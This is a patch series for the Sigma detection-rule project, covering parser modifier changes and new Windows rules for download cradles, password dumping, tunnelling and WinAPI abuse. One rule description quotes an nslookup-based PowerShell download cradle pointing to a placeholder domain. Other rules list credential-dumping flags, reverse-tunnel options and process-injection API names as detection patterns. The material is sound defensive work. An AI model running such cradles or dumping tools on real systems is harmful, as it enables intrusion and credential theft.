From 184b6bb2442e3e2ab708f6b6e9c6051e447f1ad9 Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Sun, 1 May 2022 23:07:25 +0200 Subject: [PATCH 01/73] Wrapping base64offset modified expansion group into ConditionOR --- tests/test-base64offset-all.yml | 10 ++++++++ tools/sigma/backends/base.py | 3 +++ tools/sigma/parser/modifiers/transform.py | 28 ++++++++++++++--------- tools/sigma/sigmac.py | 28 +++++++++++------------ 4 files changed, 44 insertions(+), 25 deletions(-) create mode 100644 tests/test-base64offset-all.yml diff --git a/tests/test-base64offset-all.yml b/tests/test-base64offset-all.yml new file mode 100644 index 000000000..9d23c8f65 --- /dev/null +++ b/tests/test-base64offset-all.yml @@ -0,0 +1,10 @@ +title: Testrule +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|base64offset|contains|all: + - foo + - bar + condition: selection \ No newline at end of file diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py index c12face60..b22f5dadf 100644 --- a/tools/sigma/backends/base.py +++ b/tools/sigma/backends/base.py @@ -21,6 +21,7 @@ import yaml import re from sigma.backends.exceptions import NotSupportedError +from sigma.parser.condition import ConditionOR from .mixins import RulenameCommentMixin, QuoteCharMixin from sigma.parser.modifiers.base import SigmaTypeModifier @@ -328,6 +329,8 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): return self.generateMapItemTypedNode(transformed_fieldname, value) elif value is None: return self.nullExpression % (transformed_fieldname, ) + elif isinstance(value, ConditionOR): + return self.generateORNode(value) else: raise TypeError("Backend does not support map values of type " + str(type(value))) diff --git a/tools/sigma/parser/modifiers/transform.py b/tools/sigma/parser/modifiers/transform.py index 8af354176..b0399e6bb 100644 --- a/tools/sigma/parser/modifiers/transform.py +++ b/tools/sigma/parser/modifiers/transform.py @@ -16,7 +16,7 @@ from .base import SigmaTransformModifier from .mixins import ListOrStringModifierMixin -from sigma.parser.condition import ConditionAND +from sigma.parser.condition import ConditionAND, ConditionBase, ConditionOR from base64 import b64encode class SigmaContainsModifier(ListOrStringModifierMixin, SigmaTransformModifier): @@ -24,14 +24,17 @@ class SigmaContainsModifier(ListOrStringModifierMixin, SigmaTransformModifier): identifier = "contains" active = True - def apply_str(self, val : str): - if not val.startswith("*"): - val = "*" + val - if not val.endswith("*"): - if val.endswith("\\"): - val += "\\*" - else: - val += "*" + def apply_str(self, val): + try: + if not val.startswith("*"): + val = "*" + val + if not val.endswith("*"): + if val.endswith("\\"): + val += "\\*" + else: + val += "*" + except AttributeError: + pass return val class SigmaStartswithModifier(ListOrStringModifierMixin, SigmaTransformModifier): @@ -61,7 +64,7 @@ class SigmaAllValuesModifier(SigmaTransformModifier): """Override default OR-linking behavior for list with AND-linking of all list values""" identifier = "all" active = True - valid_input_types = (list, tuple, ) + valid_input_types = (list, tuple, ConditionBase) def apply(self): vals = super().apply() @@ -93,7 +96,7 @@ class SigmaBase64OffsetModifier(ListOrStringModifierMixin, SigmaTransformModifie def apply_str(self, val): if type(val) == str: val = val.encode() - return [ + items = [ b64encode( i * b' ' + val )[ @@ -102,6 +105,9 @@ class SigmaBase64OffsetModifier(ListOrStringModifierMixin, SigmaTransformModifie ].decode() for i in range(3) ] + cond = ConditionOR() + cond.items = items + return cond class SigmaEncodingBaseModifier(ListOrStringModifierMixin, SigmaTransformModifier): """ diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 80eccc23a..4d757ff01 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -109,14 +109,14 @@ def set_argparser(): Multiple log source specifications are AND linked. Special filter: inlastday=X rule create or modified in the last X days period - tlp=valid_tlp if rule have no tlp set to WHITE + tlp=valid_tlp if rule have no tlp set to WHITE """) argparser.add_argument("--target", "-t", choices=backends.getBackendDict().keys(), help="Output target format") argparser.add_argument("--lists", "-l", action="store_true", help="List available output target formats and configurations") argparser.add_argument("--lists-files-after-date", "-L",help="List yml files which is modified/created after the date (Example of the date: 2022/02/01).") argparser.add_argument("--config", "-c", action="append", help="Configurations with field name and index mapping for target environment. Multiple configurations are merged into one. Last config is authoritative in case of conflicts.") argparser.add_argument("--output", "-o", default=None, help="Output file or filename prefix (if end with a '_','/' or '\\')") - argparser.add_argument("--output-fields", "-of", help="""Enhance your output with additional fields from the Sigma rule (not only the converted rule itself). + argparser.add_argument("--output-fields", "-of", help="""Enhance your output with additional fields from the Sigma rule (not only the converted rule itself). Select the fields you want by providing their list delimited with commas (no space). Only work with the '--output-format' option and with 'json' or 'yaml' value. available additional fields : title, id, status, description, author, references, fields, falsepositives, level, tags. This option do not have any effect for backends that already format output : elastalert, kibana, splukxml etc. """) @@ -132,7 +132,7 @@ def set_argparser(): argparser.add_argument("--verbose", "-v", action="store_true", help="Be verbose") argparser.add_argument("--debug", "-D", action="store_true", help="Debugging output") argparser.add_argument("inputs", nargs="*", help="Sigma input files ('-' for stdin)") - + return argparser def list_backends(debug): @@ -264,7 +264,7 @@ def main(): exit(ERR_CONFIG_PARSING) if cmdargs.output_fields: - if cmdargs.output_format: + if cmdargs.output_format: output_fields_rejected = [field for field in cmdargs.output_fields.split(",") if field not in allowed_fields] # Not allowed fields if output_fields_rejected: print("These fields are not allowed (check help for allow field list) : %s" % (", ".join(output_fields_rejected)), file=sys.stderr) @@ -277,7 +277,7 @@ def main(): backend_options = BackendOptions(cmdargs.backend_option, cmdargs.backend_config) backend = backend_class(sigmaconfigs, backend_options) - + filename_ext = cmdargs.output_extention filename = cmdargs.output fileprefix = None @@ -289,7 +289,7 @@ def main(): filename_ext = '.' + filename_ext else: filename_ext = '.rule' - + if filename[-1:] in ['_','/','\\']: fileprefix = filename else: @@ -321,7 +321,7 @@ def main(): nb_result = len(list(copy.deepcopy(results))) inc_filenane = None if nb_result < 2 else 0 - + newline_separator = '\0' if cmdargs.print0 else '\n' results = list(results) # Since results is an iterator and used twice we convert it a list @@ -338,7 +338,7 @@ def main(): elif not fileprefix == None and inc_filenane == None: # a simple yml try: filename = fileprefix + str(sigmafile.name) - filename = filename.replace('.yml',filename_ext) + filename = filename.replace('.yml',filename_ext) out = open(filename, "w", encoding='utf-8') except (IOError, OSError) as e: print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) @@ -368,7 +368,7 @@ def main(): fileprefix = None # no need to open the same file many time except (IOError, OSError) as e: print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) - exit(ERR_OUTPUT) + exit(ERR_OUTPUT) except OSError as e: print("Failed to open Sigma file %s: %s" % (sigmafile, str(e)), file=sys.stderr) @@ -405,7 +405,7 @@ def main(): error = ERR_BACKEND if not cmdargs.defer_abort: sys.exit(error) - except (NotImplementedError, TypeError) as e: + #except (NotImplementedError, TypeError) as e: print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) # traceback.print_exc() logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) @@ -429,16 +429,16 @@ def main(): if not cmdargs.ignore_backend_errors: error = ERR_FULL_FIELD_MATCH if not cmdargs.defer_abort: - sys.exit(error) + sys.exit(error) finally: try: f.close() except: pass - + if success : - logger.debug("* Convertion Sigma input %s SUCCESS" % (sigmafile)) - + logger.debug("* Convertion Sigma input %s SUCCESS" % (sigmafile)) + result = backend.finalize() if result: print(result, file=out) From 58dea50656acad5a515f97134f17601f760727ca Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Sun, 1 May 2022 23:17:33 +0200 Subject: [PATCH 02/73] Fix: Subexpression with OR instead of OR --- tools/sigma/backends/base.py | 6 +++--- tools/sigma/parser/modifiers/transform.py | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py index b22f5dadf..62351e838 100644 --- a/tools/sigma/backends/base.py +++ b/tools/sigma/backends/base.py @@ -21,7 +21,7 @@ import yaml import re from sigma.backends.exceptions import NotSupportedError -from sigma.parser.condition import ConditionOR +from sigma.parser.condition import ConditionOR, NodeSubexpression from .mixins import RulenameCommentMixin, QuoteCharMixin from sigma.parser.modifiers.base import SigmaTypeModifier @@ -329,8 +329,8 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): return self.generateMapItemTypedNode(transformed_fieldname, value) elif value is None: return self.nullExpression % (transformed_fieldname, ) - elif isinstance(value, ConditionOR): - return self.generateORNode(value) + elif isinstance(value, NodeSubexpression): + return self.generateSubexpressionNode(value) else: raise TypeError("Backend does not support map values of type " + str(type(value))) diff --git a/tools/sigma/parser/modifiers/transform.py b/tools/sigma/parser/modifiers/transform.py index b0399e6bb..2b08b17df 100644 --- a/tools/sigma/parser/modifiers/transform.py +++ b/tools/sigma/parser/modifiers/transform.py @@ -16,7 +16,7 @@ from .base import SigmaTransformModifier from .mixins import ListOrStringModifierMixin -from sigma.parser.condition import ConditionAND, ConditionBase, ConditionOR +from sigma.parser.condition import ConditionAND, ConditionBase, ConditionOR, NodeSubexpression from base64 import b64encode class SigmaContainsModifier(ListOrStringModifierMixin, SigmaTransformModifier): @@ -107,7 +107,7 @@ class SigmaBase64OffsetModifier(ListOrStringModifierMixin, SigmaTransformModifie ] cond = ConditionOR() cond.items = items - return cond + return NodeSubexpression(cond) class SigmaEncodingBaseModifier(ListOrStringModifierMixin, SigmaTransformModifier): """ From 9ee0d29d68a50622d74e3bf3331da1d2db95819a Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Mon, 2 May 2022 00:38:21 +0200 Subject: [PATCH 03/73] Windash modifier --- tests/test-windash-all.yml | 10 ++++++ tools/sigma/parser/modifiers/transform.py | 38 +++++++++++++++++++++++ 2 files changed, 48 insertions(+) create mode 100644 tests/test-windash-all.yml diff --git a/tests/test-windash-all.yml b/tests/test-windash-all.yml new file mode 100644 index 000000000..5335a1fd5 --- /dev/null +++ b/tests/test-windash-all.yml @@ -0,0 +1,10 @@ +title: Testrule +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|windash|contains|all: + - -foo-1 -bar-2 -bla-3 + - -foo-bar + condition: selection \ No newline at end of file diff --git a/tools/sigma/parser/modifiers/transform.py b/tools/sigma/parser/modifiers/transform.py index 2b08b17df..8a5267999 100644 --- a/tools/sigma/parser/modifiers/transform.py +++ b/tools/sigma/parser/modifiers/transform.py @@ -14,6 +14,7 @@ # You should have received a copy of the GNU Lesser General Public License # along with this program. If not, see . +import re from .base import SigmaTransformModifier from .mixins import ListOrStringModifierMixin from sigma.parser.condition import ConditionAND, ConditionBase, ConditionOR, NodeSubexpression @@ -109,6 +110,43 @@ class SigmaBase64OffsetModifier(ListOrStringModifierMixin, SigmaTransformModifie cond.items = items return NodeSubexpression(cond) +class SigmaWindashModifier(ListOrStringModifierMixin, SigmaTransformModifier): + """ + Expand parameter characters / and - that are often interchangeable in Windows into the other + form if it appears between word boundaries. E.g. in -param-name the first dash will be expanded + into /param-name while the second dash is left untouched. + """ + identifier = "windash" + active = True + valid_input_types = ListOrStringModifierMixin.valid_input_types + + def expand_dashes(self, val, locations, offset=0): + i = locations[0] + if len(locations) == 1: + subexpansions = [ val[i + 1:]] + else: + subexpansions = self.expand_dashes(val, locations[1:], i + 1) + + return [ + val[offset:i] + expanded + subexpansion + for expanded in ("-", "/") + for subexpansion in subexpansions + ] + + def apply_str(self, val): + dash_locations = [ + m.start() + for m in re.finditer(re.compile("\\B[-/]\\b"), val) + ] + if dash_locations == []: + return val + else: + items = self.expand_dashes(val, dash_locations) + + cond = ConditionOR() + cond.items = items + return NodeSubexpression(cond) + class SigmaEncodingBaseModifier(ListOrStringModifierMixin, SigmaTransformModifier): """ Encode string to a byte sequence with the encoding given in the encoding property. This is From 512dad2185a13c7729c7b9aafa1680107679c953 Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Mon, 2 May 2022 00:43:42 +0200 Subject: [PATCH 04/73] Removed debugging code --- tools/sigma/sigmac.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 4d757ff01..e1f19dbc4 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -405,7 +405,7 @@ def main(): error = ERR_BACKEND if not cmdargs.defer_abort: sys.exit(error) - #except (NotImplementedError, TypeError) as e: + except (NotImplementedError, TypeError) as e: print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) # traceback.print_exc() logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) From f6ec8de5864cea811d922103374e0ff9dfdeff89 Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Mon, 2 May 2022 23:22:16 +0200 Subject: [PATCH 05/73] Modifier support for conditional expressions --- tools/sigma/parser/modifiers/mixins.py | 36 ++++++++++++++++++-------- 1 file changed, 25 insertions(+), 11 deletions(-) diff --git a/tools/sigma/parser/modifiers/mixins.py b/tools/sigma/parser/modifiers/mixins.py index 97f8ad87c..302d722de 100644 --- a/tools/sigma/parser/modifiers/mixins.py +++ b/tools/sigma/parser/modifiers/mixins.py @@ -14,6 +14,9 @@ # You should have received a copy of the GNU Lesser General Public License # along with this program. If not, see . +from sigma.parser.condition import ConditionAND, ConditionBase, ConditionOR, NodeSubexpression + + class ListOrStringModifierMixin(object): """ Definitions and convenience methods for modifiers that can be applied to lists and strings. @@ -28,21 +31,32 @@ class ListOrStringModifierMixin(object): valid_input_types = (list, tuple, str, ) def apply(self): - if type(self.value) in (list, tuple, ): - return self.apply_list() + if isinstance(self.value, (list, tuple, ConditionBase, NodeSubexpression)): + return self.apply_list(self.value) else: return self.apply_str(self.value) - def apply_list(self): + def apply_list(self, l): """Method is called if modifier value contains a list""" - l = [ self.apply_str(val) for val in self.value ] - rl = list() - for i in l: - if type(i) in { list, tuple, set }: - rl.extend(i) - else: - rl.append(i) - return rl + if isinstance(l, (list, tuple)): + l = [ + self.apply_str(v) + if isinstance(v, str) + else self.apply_list(v) + for v in l ] + rl = list() + for i in l: + if type(i) in { list, tuple, set }: + rl.extend(i) + else: + rl.append(i) + return rl + elif isinstance(l, NodeSubexpression): + return NodeSubexpression(self.apply_list(l.items)) + elif isinstance(l, ( ConditionOR, ConditionAND )): + cond = l.__class__() + cond.items = self.apply_list(l.items) + return cond def apply_str(self, val : str): """Method is called if modifier input value contains a string or once for each list element""" From 26923f2d833e95161c38795a4d88fe7b81fec049 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 5 Sep 2022 18:48:40 +0200 Subject: [PATCH 06/73] Add file_event_win_susp_executable_creation --- ...ile_event_win_susp_executable_creation.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/windows/file_event/file_event_win_susp_executable_creation.yml diff --git a/rules/windows/file_event/file_event_win_susp_executable_creation.yml b/rules/windows/file_event/file_event_win_susp_executable_creation.yml new file mode 100644 index 000000000..f2da7f880 --- /dev/null +++ b/rules/windows/file_event/file_event_win_susp_executable_creation.yml @@ -0,0 +1,30 @@ +title: Suspicious Executable File Creation +id: 74babdd6-a758-4549-9632-26535279e654 +status: experimental +description: Detect creation of suspicious executable file name +author: frack113 +references: + - https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/ +date: 2022/09/05 +logsource: + product: windows + category: file_event +detection: + selection_double: + TargetFilename|endswith: + - '.bat.exe' + - '.sys.exe' + selection_folder: + TargetFilename: + - 'C:\$Recycle.Bin.exe' + - 'C:\Documents and Settings.exe' + - 'C:\MSOCache.exe' + - 'C:\Recovery.exe' + - 'C:\PerfLogs.exe' + condition: 1 of selection_* +falsepositives: + - Unknown +level: high +tags: + - attack.defense_evasion + - attack.t1564 \ No newline at end of file From ad6e085124365cc14198302d824d3795320f6612 Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Tue, 6 Sep 2022 08:49:45 +0900 Subject: [PATCH 07/73] rule add: nslookup pwsh download cradle --- ...tion_win_nslookup_pwsh_download_cradle.yml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml new file mode 100644 index 000000000..021a598aa --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml @@ -0,0 +1,20 @@ +title: Nslookup PwSh Download Cradle +id: 72671447-4352-4413-bb91-b85569687135 +status: experimental +description: 'This sexy sigma rule tries to detect sexy powershell download cradles. Ex: powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] ' +author: Zach Mathis (@yamatosecurity) +date: 2022/09/06 +references: + - https://twitter.com/alh4zr3d/status/1566489367232651264 +logsource: + category: process_creation + product: windows +detection: + selection: + ParentImage|contains: powershell + CommandLine|contains: nslookup + CommandLine|contains: txt + condition: selection +falsepositives: +level: medium +tags: \ No newline at end of file From 7c0c8996c60f720da269ea36f22e2431294d490d Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Tue, 6 Sep 2022 08:56:39 +0900 Subject: [PATCH 08/73] update --- ...tion_win_nslookup_pwsh_download_cradle.yml | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml index 021a598aa..017533392 100644 --- a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml +++ b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml @@ -1,11 +1,11 @@ -title: Nslookup PwSh Download Cradle -id: 72671447-4352-4413-bb91-b85569687135 -status: experimental -description: 'This sexy sigma rule tries to detect sexy powershell download cradles. Ex: powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] ' author: Zach Mathis (@yamatosecurity) date: 2022/09/06 -references: - - https://twitter.com/alh4zr3d/status/1566489367232651264 + +title: Nslookup PwSh Download Cradle +description: 'This sexy sigma rule tries to detect sexy powershell download cradles. Ex: powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] ' +id: 72671447-4352-4413-bb91-b85569687135 +level: medium +status: experimental logsource: category: process_creation product: windows @@ -15,6 +15,7 @@ detection: CommandLine|contains: nslookup CommandLine|contains: txt condition: selection -falsepositives: -level: medium -tags: \ No newline at end of file +references: + - https://twitter.com/alh4zr3d/status/1566489367232651264 + + From a5f5992dcbee510ab19ce4c449f7e9289b710eb9 Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Tue, 6 Sep 2022 08:59:20 +0900 Subject: [PATCH 09/73] update --- .../proc_creation_win_nslookup_pwsh_download_cradle.yml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml index 017533392..cd3edf105 100644 --- a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml +++ b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml @@ -1,6 +1,5 @@ author: Zach Mathis (@yamatosecurity) date: 2022/09/06 - title: Nslookup PwSh Download Cradle description: 'This sexy sigma rule tries to detect sexy powershell download cradles. Ex: powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] ' id: 72671447-4352-4413-bb91-b85569687135 @@ -16,6 +15,4 @@ detection: CommandLine|contains: txt condition: selection references: - - https://twitter.com/alh4zr3d/status/1566489367232651264 - - + - https://twitter.com/alh4zr3d/status/1566489367232651264 \ No newline at end of file From b90b4ad3a6f5e6f411760fee39e3f479e2510f2d Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Tue, 6 Sep 2022 09:03:43 +0900 Subject: [PATCH 10/73] update --- .../proc_creation_win_nslookup_pwsh_download_cradle.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml index cd3edf105..debbbc200 100644 --- a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml +++ b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml @@ -11,7 +11,7 @@ logsource: detection: selection: ParentImage|contains: powershell - CommandLine|contains: nslookup + Image|contains: nslookup CommandLine|contains: txt condition: selection references: From 9abdc5ab389e0f2604fbff9c429970062b517b42 Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Tue, 6 Sep 2022 09:12:40 +0900 Subject: [PATCH 11/73] update --- .../proc_creation_win_nslookup_pwsh_download_cradle.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml index debbbc200..da49a404c 100644 --- a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml +++ b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml @@ -1,6 +1,6 @@ +title: Nslookup PwSh Download Cradle author: Zach Mathis (@yamatosecurity) date: 2022/09/06 -title: Nslookup PwSh Download Cradle description: 'This sexy sigma rule tries to detect sexy powershell download cradles. Ex: powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] ' id: 72671447-4352-4413-bb91-b85569687135 level: medium From e7c53dafa17492de3c2ae45b4494339d30d9b785 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 6 Sep 2022 08:05:02 +0200 Subject: [PATCH 12/73] New rules --- ...eation_win_nslookup_poweshell_download.yml | 27 ++++++++++++++++ .../proc_creation_win_quarks_pwdump.yml | 32 +++++++++++++++++++ .../proc_creation_win_sharp_chisel_usage.yml | 32 +++++++++++++++++++ 3 files changed, 91 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml create mode 100644 rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml create mode 100644 rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml new file mode 100644 index 000000000..09f23188b --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml @@ -0,0 +1,27 @@ +title: Nslookup PowerShell Download +id: 1b3b01c7-84e9-4072-86e5-fc285a41ff23 +status: experimental +description: Detects usage of powershell in conjunction with nslookup as a mean of download. +author: Nasreddine Bencherchali +references: + - https://twitter.com/Alh4zr3d/status/1566489367232651264 +date: 2022/09/05 +logsource: + category: process_creation + product: windows +detection: + selection_cli: + CommandLine|contains|all: + - 'powershell .' + - 'nslookup' + - ' -q=txt ' + selection_img: + ParentImage|endswith: '\powershell.exe' + Image|contains: '\nslookup.exe' + CommandLine|contains: ' -q=txt ' + condition: 1 of slection_* +falsepositives: + - Unlikely +level: high +tags: + - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml b/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml new file mode 100644 index 000000000..96c99cdd5 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml @@ -0,0 +1,32 @@ +title: Quarks PwDump Usage +id: 0685b176-c816-4837-8e7b-1216f346636b +status: experimental +description: Detects usage of the Quarks PwDump tool via commandline arguments +author: Nasreddine Bencherchali +references: + - https://github.com/quarkslab/quarkspwdump + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east +date: 2022/09/05 +logsource: + category: process_creation + product: windows +detection: + selection_img: + Image|endswith: '\QuarksPwDump.exe' + selection_cli: + CommandLine: + - ' -dhl' + - ' --dump-hash-local' + - ' -dhdc' + - ' --dump-hash-domain-cached' + - ' --dump-bitlocker' + - ' -dhd ' + - ' --dump-hash-domain ' + - '--ntds-file' + condition: 1 of selection_* +falsepositives: + - Unlikely +level: high +tags: + - attack.credential_access + - attack.t1003.002 diff --git a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml new file mode 100644 index 000000000..a28f7d2c3 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml @@ -0,0 +1,32 @@ +title: SharpChisel Usage +id: cf93e05e-d798-4d9e-b522-b0248dc61eaf +status: experimental +description: Detects usage of the Sharp Chisel via the commandline arguments +author: Nasreddine Bencherchali +references: + - https://github.com/shantanu561993/SharpChisel + - https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/ +date: 2022/09/05 +logsource: + category: process_creation + product: windows +detection: + selection_img: + Image|endswith: '\SharpChisel.exe' + selection_client_server: + CommandLine|contains: + - 'exe client ' + - 'exe server ' + selection_flags: + CommandLine|contains: + - ' --socks5' + - ' --reverse' + - ' r:' + - ':127.0.0.1:' + condition: 1 of selection_* +falsepositives: + - Some flalse positives may occure with other tools with similar commandlines +level: medium +tags: + - attack.command_and_control + - attack.t1090.001 From b70e42b2068898c2f3d5911a9289210d35965119 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 6 Sep 2022 09:14:03 +0200 Subject: [PATCH 13/73] Create proc_creation_win_inline_win_api_access.yml --- ...roc_creation_win_inline_win_api_access.yml | 70 +++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml diff --git a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml new file mode 100644 index 000000000..3b276add6 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml @@ -0,0 +1,70 @@ +title: Accessing WinAPI Via CommandLine +id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702 +related: + - id: 03d83090-8cba-44a0-b02f-0b756a050306 + type: derived +status: experimental +description: Detects the use of WinAPI Functions via the commandline as seen used by threat actors via the tool winapiexec +author: Nasreddine Bencherchali +date: 2022/09/06 +references: + - https://twitter.com/m417z/status/1566674631788007425 +tags: + - attack.execution + - attack.t1106 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + - 'WaitForSingleObject' + - 'QueueUserApc' + - 'RtlCreateUserThread' + - 'OpenProcess' + - 'VirtualAlloc' + - 'VirtualFree' + - 'WriteProcessMemory' + - 'CreateUserThread' + - 'CloseHandle' + - 'GetDelegateForFunctionPointer' + - 'CreateThread' + - 'memcpy' + - 'LoadLibrary' + - 'GetModuleHandle' + - 'GetProcAddress' + - 'VirtualProtect' + - 'FreeLibrary' + - 'ReadProcessMemory' + - 'CreateRemoteThread' + - 'AdjustTokenPrivileges' + - 'WriteInt32' + - 'OpenThreadToken' + - 'PtrToString' + - 'FreeHGlobal' + - 'ZeroFreeGlobalAllocUnicode' + - 'OpenProcessToken' + - 'GetTokenInformation' + - 'SetThreadToken' + - 'ImpersonateLoggedOnUser' + - 'RevertToSelf' + - 'GetLogonSessionData' + - 'CreateProcessWithToken' + - 'DuplicateTokenEx' + - 'OpenWindowStation' + - 'OpenDesktop' + - 'MiniDumpWriteDump' + - 'AddSecurityPackage' + - 'EnumerateSecurityPackages' + - 'GetProcessHandle' + - 'DangerousGetHandle' + - 'kernel32' + - 'Advapi32' + - 'msvcrt' + - 'ntdll' + - 'user32' # FP with chocolatey + - 'secur32' + condition: selection +falsepositives: + - Unknown +level: high From 65cc3b2dc8d2cd196dd0b76a21efb0a39128a7a6 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 6 Sep 2022 09:17:35 +0200 Subject: [PATCH 14/73] Update file_event_win_susp_executable_creation.yml --- .../file_event/file_event_win_susp_executable_creation.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/file_event/file_event_win_susp_executable_creation.yml b/rules/windows/file_event/file_event_win_susp_executable_creation.yml index f2da7f880..3444fe185 100644 --- a/rules/windows/file_event/file_event_win_susp_executable_creation.yml +++ b/rules/windows/file_event/file_event_win_susp_executable_creation.yml @@ -1,9 +1,10 @@ title: Suspicious Executable File Creation id: 74babdd6-a758-4549-9632-26535279e654 status: experimental -description: Detect creation of suspicious executable file name +description: Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths. author: frack113 references: + - https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae - https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/ date: 2022/09/05 logsource: @@ -27,4 +28,4 @@ falsepositives: level: high tags: - attack.defense_evasion - - attack.t1564 \ No newline at end of file + - attack.t1564 From c81f87c3331212b801c989e54b05e8f9d0c0bd95 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 6 Sep 2022 09:39:45 +0200 Subject: [PATCH 15/73] refactor: renamed sdelete and increased level --- .../proc_creation_win_renamed_sdelete.yml | 31 +++++++++++++++++++ .../proc_creation_win_sdelete.yml | 8 ++--- 2 files changed, 35 